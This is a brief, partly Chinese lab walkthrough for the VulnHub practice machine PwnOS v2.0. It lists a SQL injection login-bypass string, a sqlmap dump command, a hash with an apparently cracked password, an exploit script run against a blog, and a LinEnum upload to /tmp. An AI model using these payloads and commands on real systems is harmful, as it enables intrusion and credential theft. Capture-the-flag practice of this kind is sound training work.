vulnhub >_ PwnOS_v2.0
Published on 09 Nov 2020
PwnOS_v2.0
nikto
admin' or '1'='1'#
登录无内容,保存登录包到文件,执行sqlmap注入
sqlmap -r login.txt -dump
c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
killerbeesareflying
另一页面
searchsploit
perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U evil -P evil
上传LinEnum到目标可写的/tmp,并执行